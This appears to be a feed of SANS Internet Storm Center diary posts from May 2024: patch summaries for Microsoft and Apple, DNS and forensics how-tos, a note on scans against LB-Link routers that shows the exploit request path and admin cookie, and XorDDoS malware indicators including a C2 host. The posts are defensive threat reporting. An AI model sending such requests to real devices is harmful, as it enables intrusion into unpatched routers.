There is an important vulnerability affecting MinGit software (CVE-2024-32002), used by Microsoft Visual Studio, caused by an improper limitation of a pathname to a restricted directory ('Path Traversal') making it susceptible to Remote Code Execution. It is being documented in the Security Update Guide to announce that the latest builds of Visual Studio are no longer vulnerable. Please see Security Update Guide Supports CVEs Assigned by Industry Partners for more information. The CVSS for the vulnerability is 9.0 – the highest for this month.

See the full list of patches:

Description
CVE Disclosed Exploited Exploitability (old versions) current version Severity CVSS Base (AVG) CVSS Temporal (AVG)
.NET and Visual Studio Remote Code Execution Vulnerability
%%cve:2024-30045%% No No - - Important 6.3 5.5
Azure Migrate Cross-Site Scripting Vulnerability
%%cve:2024-30053%% No No - - Important 6.5 5.9
CVE-2024-32002 Recursive clones on case-insensitive filesystems that support symlinks are susceptible to Remote Code Execution
%%cve:2024-32002%% No No - - Important 9.0 7.8
Chromium: CVE-2024-4331 Use after free in Picture In Picture
%%cve:2024-4331%% No No - - -    
Chromium: CVE-2024-4368 Use after free in Dawn
%%cve:2024-4368%% No No - - -    
Chromium: CVE-2024-4558 Use after free in ANGLE
%%cve:2024-4558%% No No - - -    
Chromium: CVE-2024-4559 Heap buffer overflow in WebAudio
%%cve:2024-4559%% No No - - -    
Chromium: CVE-2024-4671 Use after free in Visuals
%%cve:2024-4671%% No No - - -    
DHCP Server Service Denial of Service Vulnerability
%%cve:2024-30019%% No No - - Important 6.5 5.7
Dynamics 365 Customer Insights Spoofing Vulnerability
%%cve:2024-30047%% No No - - Important 7.6 6.6
%%cve:2024-30048%% No No - - Important 7.6 6.6
GitHub: CVE-2024-32004 Remote Code Execution while cloning special-crafted local repositories
%%cve:2024-32004%% No No - - Important 8.1 7.1
Microsoft Bing Search Spoofing Vulnerability
%%cve:2024-30041%% No No - - Important 5.4 4.7
Microsoft Brokering File System Elevation of Privilege Vulnerability
%%cve:2024-30007%% No No - - Important 8.8 7.7
Microsoft Edge (Chromium-based) Spoofing Vulnerability
%%cve:2024-30055%% No No Less Likely Less Likely Low 5.4 4.7
Microsoft Excel Remote Code Execution Vulnerability
%%cve:2024-30042%% No No - - Important 7.8 6.8
Microsoft Intune for Android Mobile Application Management Tampering Vulnerability
%%cve:2024-30059%% No No - - Important 6.1 5.8
Microsoft PLUGScheduler Scheduled Task Elevation of Privilege Vulnerability
%%cve:2024-26238%% No No - - Important 7.8 6.8
Microsoft Power BI Client JavaScript SDK Information Disclosure Vulnerability
%%cve:2024-30054%% No No - - Important 6.5 5.7
Microsoft SharePoint Server Information Disclosure Vulnerability
%%cve:2024-30043%% No No - - Important 6.5 5.7
Microsoft SharePoint Server Remote Code Execution Vulnerability
%%cve:2024-30044%% No No - - Critical 8.8 7.7
Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
%%cve:2024-30006%% No No - - Important 8.8 7.7
Microsoft Windows SCSI Class System File Elevation of Privilege Vulnerability
%%cve:2024-29994%% No No - - Important 7.8 6.8
NTFS Elevation of Privilege Vulnerability
%%cve:2024-30027%% No No - - Important 7.8 6.8
Visual Studio Denial of Service Vulnerability
%%cve:2024-30046%% Yes No - - Important 5.9 5.2
Win32k Elevation of Privilege Vulnerability
%%cve:2024-30028%% No No - - Important 7.8 6.8
%%cve:2024-30030%% No No - - Important 7.8 6.8
%%cve:2024-30038%% No No - - Important 7.8 6.8
Windows CNG Key Isolation Service Elevation of Privilege Vulnerability
%%cve:2024-30031%% No No - - Important 7.8 6.8
Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability
%%cve:2024-30034%% No No - - Important 5.5 4.8
Windows Common Log File System Driver Elevation of Privilege Vulnerability
%%cve:2024-29996%% No No - - Important 7.8 6.8
%%cve:2024-30025%% No No - - Important 7.8 6.8
%%cve:2024-30037%% No No - - Important 7.5 6.5
Windows Cryptographic Services Information Disclosure Vulnerability
%%cve:2024-30016%% No No - - Important 5.5 4.8
Windows Cryptographic Services Remote Code Execution Vulnerability
%%cve:2024-30020%% No No - - Important 8.1 7.1
Windows DWM Core Library Elevation of Privilege Vulnerability
%%cve:2024-30032%% No No - - Important 7.8 6.8
%%cve:2024-30035%% No No - - Important 7.8 6.8
%%cve:2024-30051%% Yes Yes - - Important 7.8 7.2
Windows DWM Core Library Information Disclosure Vulnerability
%%cve:2024-30008%% No No - - Important 5.5 4.8
Windows Deployment Services Information Disclosure Vulnerability
%%cve:2024-30036%% No No - - Important 6.5 5.7
Windows Hyper-V Denial of Service Vulnerability
%%cve:2024-30011%% No No - - Important 6.5 5.7
Windows Hyper-V Remote Code Execution Vulnerability
%%cve:2024-30010%% No No - - Important 8.8 7.7
%%cve:2024-30017%% No No - - Important 8.8 7.7
Windows Kernel Elevation of Privilege Vulnerability
%%cve:2024-30018%% No No - - Important 7.8 6.8
Windows MSHTML Platform Security Feature Bypass Vulnerability
%%cve:2024-30040%% No Yes - - Important 8.8 8.2
Windows Mark of the Web Security Feature Bypass Vulnerability
%%cve:2024-30050%% No No - - Moderate 5.4 5.0
Windows Mobile Broadband Driver Remote Code Execution Vulnerability
%%cve:2024-29997%% No No - - Important 6.8 5.9
%%cve:2024-29998%% No No - - Important 6.8 5.9
%%cve:2024-29999%% No No - - Important 6.8 5.9
%%cve:2024-30000%% No No - - Important 6.8 5.9
%%cve:2024-30001%% No No - - Important 6.8 5.9
%%cve:2024-30002%% No No - - Important 6.8 5.9
%%cve:2024-30003%% No No - - Important 6.8 5.9
%%cve:2024-30004%% No No - - Important 6.8 5.9
%%cve:2024-30005%% No No - - Important 6.8 5.9
%%cve:2024-30012%% No No - - Important 6.8 5.9
%%cve:2024-30021%% No No - - Important 6.8 5.9
Windows Remote Access Connection Manager Information Disclosure Vulnerability
%%cve:2024-30039%% No No - - Important 5.5 4.8
Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
%%cve:2024-30009%% No No - - Important 8.8 7.7
%%cve:2024-30014%% No No - - Important 7.5 6.6
%%cve:2024-30015%% No No - - Important 7.5 6.5
%%cve:2024-30022%% No No - - Important 7.5 6.5
%%cve:2024-30023%% No No - - Important 7.5 6.5
%%cve:2024-30024%% No No - - Important 7.5 6.5
%%cve:2024-30029%% No No - - Important 7.5 6.5
Windows Search Service Elevation of Privilege Vulnerability
%%cve:2024-30033%% No No - - Important 7.0 6.1
Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability
%%cve:2024-30049%% No No - - Important 7.8 6.8

 

--
Renato Marinho
Morphus Labs| LinkedIn|Twitter

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Apple Patches Everything: macOS, iOS, iPadOS, watchOS, tvOS updated., (Tue, May 14th)

Apple today released updates for its various operating systems. The updates cover iOS, iPadOS, macOS, watchOS and tvOS. A standalone update for Safari was released for older versions of macOS. One already exploited vulnerability, CVE-2024-23296 is patched for older versions of macOS and iOS. In March, Apple patched this vulnerability for more recent versions of iOS and macOS.

 

Safari 17.5 iOS 17.5 and iPadOS 17.5 iOS 16.7.8 and iPadOS 16.7.8 macOS Sonoma 14.5 macOS Ventura 13.6.7 macOS Monterey 12.7.5 watchOS 10.5 tvOS 17.5
CVE-2024-27834 [moderate] WebKit
The issue was addressed with improved checks.
An attacker with arbitrary read and write capability may be able to bypass Pointer Authentication
x x   x     x x
CVE-2024-27804 [important] AppleAVD
The issue was addressed with improved memory handling.
An app may be able to execute arbitrary code with kernel privileges
  x   x     x x
CVE-2024-27816 [moderate] RemoteViewServices
A logic issue was addressed with improved checks.
An attacker may be able to access user data
  x   x     x x
CVE-2024-27841 [important] AVEVideoEncoder
The issue was addressed with improved memory handling.
An app may be able to disclose kernel memory
  x   x        
CVE-2024-27839 [moderate] Find My
A privacy issue was addressed by moving sensitive data to a more secure location.
A malicious application may be able to determine a user's current location
  x            
CVE-2024-27818 [moderate] Kernel
The issue was addressed with improved memory handling.
An attacker may be able to cause unexpected app termination or arbitrary code execution
  x   x        
CVE-2023-42893 [moderate] Libsystem
A permissions issue was addressed by removing vulnerable code and adding additional checks.
An app may be able to access protected user data
  x   x        
CVE-2024-27810 [important] Maps
A path handling issue was addressed with improved validation.
An app may be able to read sensitive location information
  x   x     x x
CVE-2024-27852 [moderate] MarketplaceKit
A privacy issue was addressed with improved client ID handling for alternative app marketplaces.
A maliciously crafted webpage may be able to distribute a script that tracks users on other webpages
  x            
CVE-2024-27835 [moderate] Notes
This issue was addressed through improved state management.
An attacker with physical access to an iOS device may be able to access notes from the lock screen
  x            
CVE-2024-27803 [moderate] Screenshots
A permissions issue was addressed with improved validation.
An attacker with physical access may be able to share items from the lock screen
  x            
CVE-2024-27821 [moderate] Shortcuts
A path handling issue was addressed with improved validation.
A shortcut may output sensitive user data without consent
  x   x     x  
CVE-2024-27847 [important] Sync Services
This issue was addressed with improved checks
An app may be able to bypass Privacy preferences
  x   x        
CVE-2024-27796 [moderate] Voice Control
The issue was addressed with improved checks.
An attacker may be able to elevate privileges
  x   x        
CVE-2024-27789 [important] Foundation
A logic issue was addressed with improved checks.
An app may be able to access user-sensitive data
    x   x x    
CVE-2024-23296 [moderate] *** EXPLOITED *** RTKit
A memory corruption issue was addressed with improved validation.
An attacker with arbitrary kernel read and write capability may be able to bypass kernel memory protections. Apple is aware of a report that this issue may have been exploited.
    x   x      
CVE-2024-27837 [moderate] AppleMobileFileIntegrity
A downgrade issue was addressed with additional code-signing restrictions.
A local attacker may gain access to Keychain items
      x        
CVE-2024-27825 [moderate] AppleMobileFileIntegrity
A downgrade issue affecting Intel-based Mac computers was addressed with additional code-signing restrictions.
An app may be able to bypass certain Privacy preferences
      x        
CVE-2024-27829 [moderate] AppleVA
The issue was addressed with improved memory handling.
Processing a file may lead to unexpected app termination or arbitrary code execution
      x        
CVE-2024-23236 [moderate] CFNetwork
A correctness issue was addressed with improved checks.
An app may be able to read arbitrary files
      x        
CVE-2024-27827 [moderate] Finder
This issue was addressed through improved state management.
An app may be able to read arbitrary files
      x        
CVE-2024-27822 [important] PackageKit
A logic issue was addressed with improved restrictions.
An app may be able to gain root privileges
      x        
CVE-2024-27824 [moderate] PackageKit
This issue was addressed by removing the vulnerable code.
An app may be able to elevate privileges
      x        
CVE-2024-27813 [moderate] PrintCenter
The issue was addressed with improved checks.
An app may be able to execute arbitrary code out of its sandbox or with certain elevated privileges
      x        
CVE-2024-27843 [moderate] SharedFileList
A logic issue was addressed with improved checks.
An app may be able to elevate privileges
      x        
CVE-2024-27798 [moderate] StorageKit
An authorization issue was addressed with improved state management.
An attacker may be able to elevate privileges
      x        
CVE-2024-27842 [important] udf
The issue was addressed with improved checks.
An app may be able to execute arbitrary code with kernel privileges
      x        
CVE-2023-42861 [moderate] Login Window
A logic issue was addressed with improved state management.
An attacker with knowledge of a standard user's credentials can unlock another standard user's locked screen on the same Mac
        x      
CVE-2024-23229 [moderate] Find My
This issue was addressed with improved redaction of sensitive information.
A malicious application may be able to access Find My data
          x    

 

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

DNS Suffixes on Windows, (Sun, May 12th)

I was asked if I could provide mote details on the following sentence from my diary entry "nslookup's Debug Options":

     (notice that in my nslookup query, I terminated the FQDN with a dot: "example.com.", I do that to prevent Windows from adding suffixes)

A DNS suffix is a configuration of the Windows DNS client (locally, via DHCP, ...) to have it append suffixes when doing domain lookups.

For example, if a DNS suffix local is configured, then Windows' DNS client will not only do a DNS lookup for example.com, but also for example.com.local.

As an example, let me configure mylocalnetwork as a suffix on a Windows machine:

With DNS suffix mylocalnetwork configured, nslookup will use this suffix. For example, when I perform a lookup for "example.com", nslookup will also do a lookup for "example.com.mylocalnetwork".

I can show this with nslookup's debug option d2:

You can see in these screenshots DNS type A and AAAA resolutions for example.com.mylocalnetwork and example.com.

One of the ideas behind DNS suffixes, is to reduce typing. If you have a NAS, for example, named mynas, you can just access it with https://mynas/login. No need to type the fully qualified domain name (FQDN) https://mynas.mylocalnetwork/login.

Notice that the suffix also applies for AAAA queries, while in the screenshots above I only configured it for IPv4. That's because the DNS suffix setting applies both to IPv4 and IPv6:

Before I show the results with "example.com." (notice the dot character at the end), let me show how I can summarize the lookups by grepping for "example" (findstr):

If I terminate my DNS query with a dot character (.), suffixes will not be appended:

Notice that there are no resolutions for mylocalnetwork in this last example. That's because the trailing dot instructs Windows' DNS client to start resolving from the DNS root zone.

A domain name consists of domain labels separated by dots:

If you are adding a trailing dot, you are actually adding an empty domain label:

The empty label represents the DNS root zone, and no suffixes are appended to the DNS root zone, as it is the top-level (root) DNS zone.

A small tip if you want to restrict nslookup's resolutions to A records, for example. There is an option for that.

If you use nslookup's help option /?, you will see that you can provide options, but the actual options are not listed:

To see the available options, start nslookup, and then type "?" at its prompt, like this:

Now you can see that option "type" allows you to specify which type of records to query. Here is an example for A records:

 

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Analyzing PDF Streams, (Thu, May 9th)

Occasionaly, Xavier and Jim will ask me specific students' questions about my tools when they teach FOR610: Reverse-Engineering Malware.

Recently, a student wanted to know if my pdf-parser.py tool can extract all the PDF streams with a single command.

Since version 0.7.9, it can.

A stream is (binary) data, part of an object (optional), and can be compressed, or otherwise transformed. To view a single stream with pdf-parser, one selects the object of interest and uses option -f to apply the filters (like zlib decompression) to the stream:

 

I added a feature that is present in several of my tools, like oledump.py and zipdump.py: extract al of the "stored items" into a single JSON document.

When you use pdf-parser's option -j (--jsonoutput), all objects with a stream, will have the raw data (e.g., unfiltered) extracted and put into a JSON document that is sent to stdout:

To have the filtered (e.g., decompressed data), use option -f together with option -j:

What can you do with this JSON data? It depends on what your goals are. I have several tools that can take this JSON data as input, like file-magic.py and strings.py.

Here I use file-magic.py to identify the type of each raw data stream:

From this we can learn, for example, that object 143's stream contains a JPEG image.

And here I use file-magic.py to identify the type of each filtered data stream:

From this we can learn, for example, that object 881's stream contains a compressed TrueType Font file.

What if you want to write all stream data to disk, in individual files, for further analysis (that's what the student wanted to do, I guess)?

Then you can use my tool myjson-filter.py. It's a tool designed to filter JSON data produced by my tools, but it can also write items to disk.

When you use option -l, this tool will just produce a listing of the items contained in de JSON data:

And you can use option -W to write the streams to disk. -W takes a value that specifies what aming convention must be used to write the file to disk. vir will write items to disk with their sanitized name and extension .vir:

hashvir will write items to disk with their sha256 value as name and extension .vir:

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Analyzing Synology Disks on Linux, (Wed, May 8th)

Synology NAS solutions are popular devices. They are also used in many organizations. Their product range goes from small boxes with two disks (I’m not sure they still sell a single-disk enclosure today) up to monsters, rackable with plenty of disks. They offer multiple disk management options but rely on many open-source software (like most appliances). For example, there are no expensive hardware RAID controllers in the box. They use the good old “MD” (“multiple devices”) technology, managed with the well-known mdadm tool[1]. Synology NAS run a Linux distribution called DSM. This operating system has plenty of third-party tools but lacks pure forensics tools.

In a recent investigation, I had to investigate a NAS that was involved in a ransomware attack. Many files (backups) were deleted. The attacker just deleted some shared folders. The device had two drives configured in RAID0 (not the best solution I know but they lack storage capacity). The idea was to mount the file system (or at least have the block device) on a Linux host and run forensic tools, for example, photorec.

In such a situation, the biggest challenge will be to connect all the drivers to the analysis host! Here, I had only two drives but imagine that you are facing a bigger model with 5+ disks. In my case, I used two USB-C/SATA adapters to connect the drives. Besides the software RAID, Synology volumes also rely on LVM2 (“Logical Volume Manager”)[2]. In most distributions, the packages mdadm and lvm2 are available (for example on SIFT Workstation). Otherwise, just install them:

# apt install mdadm lvm2

Once you connect the disks (tip: add a label on them to replace them in the right order) to the analysis host, verify if they are properly detected:

# lsblk
NAME    MAJ:MIN RM   SIZE RO TYPE  MOUNTPOINTS
sda       8:0    0 465.8G  0 disk
|-sda1    8:1    0 464.8G  0 part  /
|-sda2    8:2    0     1K  0 part
`-sda5    8:5    0   975M  0 part  [SWAP]
sdb       8:16   0   3.6T  0 disk
|-sdb1    8:17   0     8G  0 part
|-sdb2    8:18   0     2G  0 part
`-sdb3    8:19   0   3.6T  0 part
sdc       8:32   0   3.6T  0 disk
|-sdc1    8:33   0   2.4G  0 part
|-sdc2    8:34   0     2G  0 part
`-sdc3    8:35   0   3.6T  0 part
sr0      11:0    1  1024M  0 rom

"sdb3" and "sdc3" are the NAS partitions used to store data (2 x 4TB in RAID0). The good news, the kernel will detect that these disks are part of a software RAID! You just need to rescan them and "re-assemble" the RAID:

# mdadm --assemble --readonly --scan --force --run 

Then, your data should be available via a /dev/md? device:

# cat /proc/mdstat
Personalities : [raid0]
md0 : active (read-only) raid0 sdb3[0] sdc3[1]
      7792588416 blocks super 1.2 64k chunks

unused devices: <none>

The next step is to detect how data are managed by the NAS. Synology provides a technology called SHR[3] that uses LVM:

# lvdisplay
  WARNING: PV /dev/md0 in VG vg1 is using an old PV header, modify the VG to update.
  --- Logical volume ---
  LV Path                /dev/vg1/syno_vg_reserved_area
  LV Name                syno_vg_reserved_area
  VG Name                vg1
  LV UUID                08g9nN-Etde-JFN9-tn3D-JPHS-pyoC-LkVZAI
  LV Write Access        read/write
  LV Creation host, time ,
  LV Status              NOT available
  LV Size                12.00 MiB
  Current LE             3
  Segments               1
  Allocation             inherit
  Read ahead sectors     auto

  --- Logical volume ---
  LV Path                /dev/vg1/volume_1
  LV Name                volume_1
  VG Name                vg1
  LV UUID                fgjC0Y-mvx5-J5Qd-Us2k-Ppaz-KG5X-tgLxaX
  LV Write Access        read/write
  LV Creation host, time ,
  LV Status              NOT available
  LV Size                <7.26 TiB
  Current LE             1902336
  Segments               1
  Allocation             inherit
  Read ahead sectors     auto

You can see that the NAS has only one volume created ("volume_1" is the default name in DSM).

From now on, you can use /dev/vg1/volume_1 in your investigations. Mount it, scan it, image it, etc...

[1] https://en.wikipedia.org/wiki/Mdadm
[2] https://en.wikipedia.org/wiki/Logical_Volume_Manager_(Linux)
[3] https://kb.synology.com/en-br/DSM/tutorial/What_is_Synology_Hybrid_RAID_SHR

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Detecting XFinity/Comcast DNS Spoofing, (Mon, May 6th)

ISPs have a history of intercepting DNS. Often, DNS interception is done as part of a "value add" feature to block access to known malicious websites. Sometimes, users are directed to advertisements if they attempt to access a site that doesn't exist. There are two common techniques how DNS spoofing/interception is done:

  1. The ISP provides a recommended DNS server. This DNS server will filter requests to known malicious sites.
  2. The ISP intercepts all DNS requests, not just requests directed at the ISPs DNS server.

The first method is what I would consider a "recommended" or "best practice" method. The customer can use the ISP's DNS server, but traffic is left untouched if a customer selects a different recursive resolver. The problem with this approach is that malware sometimes alters the user's DNS settings.

Comcast, as part of its "Business Class" offer, provides a tool called "Security Edge". It is typically included for free as part of the service. Security Edge is supposed to interface with the customer's modem but can only do so for specific configurations. Part of the service is provided by DNS interception. Even if "Security Edge" is disabled in the customer's dashboard, DNS interception may still be active.

One issue with any filtering based on blocklists is false positives. In some cases, what constitutes a "malicious" hostname may not even be well defined. I could not find a definition on Comcast's website. But Bleeping Computer (www.bleepingcomputer.com) recently ended up on Comcast's "naughty list". I know all to well that it is easy for a website that covers security topics to end up on these lists. The Internet Storm Center website has been on lists like this before. Usually, sloppy signature-based checks will flag a site as malicious. An article may discuss a specific attack and quote strings triggering these signatures.

Comcast offers recursive resolvers to it's customers: 75.75.75.75, 75.75.76.76, 2001:558:feed:1 and 2001:558:feed:2. There are advantages to using your ISP's DNS servers. They are often faster as they are physically closer to your network, and you profit from responses cached by other users. My internal resolver is configured as a forwarding resolver, spreading queries among different well performing resolvers like Quad9, Cloudflare and Google.

So what happened to bleepingcomputer.com? When I wasn't able to resolve bleepingcomputer.com, I checked my DNS logs, and this entry stuck out:

broken trust chain resolving 'bleepingcomputer.com/A/IN': 8.8.8.8#53 

My resolver verifies DNSSEC. Suddenly, I could not verify DNSSEC, which is a good indication that either DNSSEC was misconfigured or someone was modifying DNS responses. Note that the response appeared to come from Google's name server (8.8.8.8).

My first step in debugging this problem was dnsviz.net, a website operated by Sandia National Laboratory. The site does a good job of visualizing DNSSEC and identifying configuration issues. Bleepingcomputer.com looked fine. Bleepingcomputer didn't use DNSSEC. So why the error? There was another error in my resolver's logs that shed some light on the issue:

no valid RRSIG resolving 'bleepingcomputer.com/DS/IN': 8.8.8.8#53

DNSSEC has to establish somehow if a particular site supports DNSSEC or not. The parent zone should offer an "NSEC3" record to identify zones that are not signed or not signed. DS records, also offered by the parent zone, verify the keys you may receive for a zone. If DNS is intercepted, the requests for these records may fail, indicating that something odd is happening.

So, someone was "playing" with DNS. And it affected various DNS servers I tried, not just Comcast or Google. Using "dig" to query the name servers directly, and skipping DNSSEC, I received a response:

8.8.8.8.53 > 10.64.10.10.4376: 35148 2/0/1 www.bleepingcomputer.com. A 192.73.243.24, www.bleepingcomputer.com. A 192.73.243.36 (85)

Usually, www.bleepingcomputer.com resolved to:

% dig +short www.bleepingcomputer.com
104.20.185.56
172.67.2.229
104.20.184.56

It took a bit of convincing, but I was able to pull up the web page at the wrong IP address:

screen shot of Comcast block page.

The problem with these warning pages is that you usually never see them. Even if you resolve the IP address, TLS will break the connection, and many sites employ strict transport security. As part of my Comcast business account, I can "brand" the page, but by default, it is hard to tell that this page was delivered by Comcast.

But how do we know if someone is interfering with DNS traffic? A simple check I am employing is to look for the DNS timing and compare the TTL values for different name servers.

(1) Check timing

Send the same query to multiple public recursive DNS servers. For example:

% dig www.bleepingcomputer.com @75.75.75.75

; <<>> DiG 9.10.6 <<>> www.bleepingcomputer.com @75.75.75.75
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8432
;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;www.bleepingcomputer.com.    IN    A

;; ANSWER SECTION:
www.bleepingcomputer.com. 89    IN    A    104.20.185.56
www.bleepingcomputer.com. 89    IN    A    104.20.184.56
www.bleepingcomputer.com. 89    IN    A    172.67.2.229

;; Query time: 59 msec
;; SERVER: 75.75.75.75#53(75.75.75.75)
;; WHEN: Tue May 07 20:00:05 EDT 2024
;; MSG SIZE  rcvd: 101

Dig includes the "Query time" in its output. In this case, it was 59 msec. We expect a speedy time like this for Comcast's DNS server while connected to Comcast's network. But let's compare this to other servers:

8.8.8.8: 59 msec
1.1.1.1: 59 msec
9.9.9.9: 64 msec
11.11.11.11: 68 msec
113.113.113.113: 69 msec

The results are very consistent. In particular, the last one is interesting. This server is located in China. 

(2) check TTLs

A recursive resolver will add a response it receives from an authoritative DNS server to its cache. The TTL for records bulled from the cache will decrease with the time the response sits in the resolver's cache. If all responses come from the same resolver, the TTL should decrement consistently. This test is a bit less telling. Often, several servers are used, and with anycast, it is not always easy to tell which server the response comes from. These servers do not always have a consistent cache.

Final Words

DNS interception, even if well-meaning, does undermine some of the basic "internet trust issues". Even if it is used to block users from malicious sites, it needs to be properly declared to the user, and switches to turn it off will have to function. This could be a particular problem if queries to other DNS filtering services are intercepted. I have yet to test this for Comcast and, for example, OpenDNS.

 

 

 

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

nslookup's Debug Options, (Sun, May 5th)

A friend was having unexpected results with DNS queries on a Windows machine. I told him to use nslookup's debug options.

When you execute a simple DNS query like "nslookup example.com. 8.8.8.8", you get an answer like this (notice that in my nslookup query, I terminated the FQDN with a dot: "example.com.", I do that to prevent Windows from adding suffixes):

You see the result of a reverse DNS lookup (8.8.8.8 is dns.google) and you get 2 IP addresses for example.com in your answer: an IPv6 address and an IPv4 address.

If my friend would have been able to run packet capture on the machine, he would have seen 3 DNS queries and answers:

A PTR query to do a reverse DNS lookup for 8.8.8.8, an A query to lookup IPv4 addresses for example.com, and an AAAA query to lookup IPv6 addresses for example.com.

One can use nslookup's debug options to obtain equivalent information, without doing a packet capture.

Debug option -d displays extra information for each DNS response packet:

Here is nslookup's parsed DNS response packet for the PTR query:

Here is Wireshark's dissection of this packet:

You can see that the debug output contains the same packet information as Wireshark's, but presented in another form.

The same applies for the A query:

And the AAAA query:

If you also want to see the DNS query packets, you can use debug option -d2:

Besides the parsed DNS query, you now also see the length in bytes of each DNS packet (the UDP payload).

Here is the A query:

And here is the AAAA query:

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Scans Probing for LB-Link and Vinga WR-AC1200 routers CVE-2023-24796, (Thu, May 2nd)

Before diving into the vulnerability, a bit about the affected devices. LB-Link, the make of the devices affected by this vulnerability, produces various wireless equipment that is sometimes sold under different brands and labels. This will make it difficult to identify affected devices. These devices are often low-cost "no name" solutions or, in some cases, may even be embedded, which makes it even more difficult to find firmware updates.

Before buying any IoT device, WiFi router, or similar piece of equipment, please make sure the vendor does:

  1. Offer firmware updates for download from an easy-to-find location.
  2. Provide an "end of life" policy stating how long a particular device will receive updates.

Alternatively, you may want to verify if the device can be "re-flashed" using an open source firmware.

But let us go back to this vulnerability. There are two URLs affected, one of which showed up in our "First Seen URLs":

/goform/sysTools
/goform/set_LimitClient_cfg

The second one has been used more in the past, the first is relatively new in our logs. The graph below shows how "set_LimitClient.cfg" is much more popular. We only saw a significant number of scans for "sysTools" on May 1st.

The full requests we are seeing:

POST /goform/set_LimitClient_cfg HTTP/1.1
Cookie: user=admin

And yes, the vulnerability evolves around the "user=admin" cookie and a command injection in the password parameter. This is too stupid to waste any more time on, but it is common enough to just give up and call it a day. The NVD entry for the vulnerability was updated last week, adding an older PoC exploit to it. Maybe that got some kids interested in this vulnerability again.

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Linux Trojan - Xorddos with Filename eyshcjdmzg, (Mon, Apr 29th)

I reviewed a filename I see regularly uploaded to my DShield sensor eyshcjdmzg that have been seeing since the 1 October 2023 which has multiple hashes and has been labeled as trojan.xorddos/ddos. These various files have only been uploaded to my DShield sensor by IP 218.92.0.60. Here is the timeline of the activity since 1 October 2023.

According to VirusTotal the oldest file submission is b39633ff1928c7f548c6a27ef4265cfd2c380230896b85f432ff15c7c819032c [1] last submitted in Aug 2019 and was uploaded to the DShield sensor only once on the 7 March 2024. 

This file can be detected with ET MALWARE DDoS.XOR Checkin via HTTP at Proofpoint Emerging Threats Open. 

Sandbox Analysis

I submitted file ea40ecec0b30982fbb1662e67f97f0e9d6f43d2d587f2f588525fae683abea73 to a few sandbox including AssemblyLine [7] to get any and all indicators that were part of this sample:

Other indicators appear to include a config file [5] that is used for C2 communications. I compared my results against other online sandbox [8][9] and there isn't much that has changed in the most active sample [1]. 

Indicators - Hashes

ea40ecec0b30982fbb1662e67f97f0e9d6f43d2d587f2f588525fae683abea73 - 65
cd9bc23360e5ca8136b2d9e6ef5ed503d2a49dd2195a3988ed93b119a04ed3a9 - 2
98e53e2d11d0aee17be3fe4fa3a0159adef6ea109f01754b345f7567c92ebebb - 1
b39633ff1928c7f548c6a27ef4265cfd2c380230896b85f432ff15c7c819032c - 1
ecc33502fa7b65dd56cb3e1b6d3bb2c0f615557c24b032e99b8acd40488fad7c - 1
b4a86fdf08279318c93a9dd6c61ceafc9ca6e9ca19de76c69772d1c3c89f72a8 - lib.xlsx
b4a86fdf08279318c93a9dd6c61ceafc9ca6e9ca19de76c69772d1c3c89f72a8 - lib.xlsxpi.enoan2107[.]com:112

Indicator - IP

218.92.0.60
114.114.114.114

Indicator - Domain

qq[.]com/lib.asp
qq[.]com/lib.xlsx
qq[.]com/lib.xlsxpi.enoan2107.com:112

Indicator - Email

keld@dkuug.dk 

[1] https://www.virustotal.com/gui/file/ea40ecec0b30982fbb1662e67f97f0e9d6f43d2d587f2f588525fae683abea73
[2] https://www.virustotal.com/gui/file/cd9bc23360e5ca8136b2d9e6ef5ed503d2a49dd2195a3988ed93b119a04ed3a9
[3] https://www.virustotal.com/gui/file/98e53e2d11d0aee17be3fe4fa3a0159adef6ea109f01754b345f7567c92ebebb
[3] https://www.virustotal.com/gui/file/b39633ff1928c7f548c6a27ef4265cfd2c380230896b85f432ff15c7c819032c
[4] https://www.virustotal.com/gui/file/ecc33502fa7b65dd56cb3e1b6d3bb2c0f615557c24b032e99b8acd40488fad7c
[5] https://www.virustotal.com/gui/file/b4a86fdf08279318c93a9dd6c61ceafc9ca6e9ca19de76c69772d1c3c89f72a8
[6] https://isc.sans.edu/ipinfo/218.92.0.60
[7] https://cybercentrecanada.github.io/assemblyline4_docs/
[8] https://www.hybrid-analysis.com/sample/ea40ecec0b30982fbb1662e67f97f0e9d6f43d2d587f2f588525fae683abea73/6542ca0426609dce5c06aef5
[9] https://www.hybrid-analysis.com/sample/f0e4649181ee9917f38233a1d7b6cbb98c9f7b484326f80c1bebc1fa3aef0645/65c332e1c38ced89350a1e94

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474, (Tue, Apr 30th)

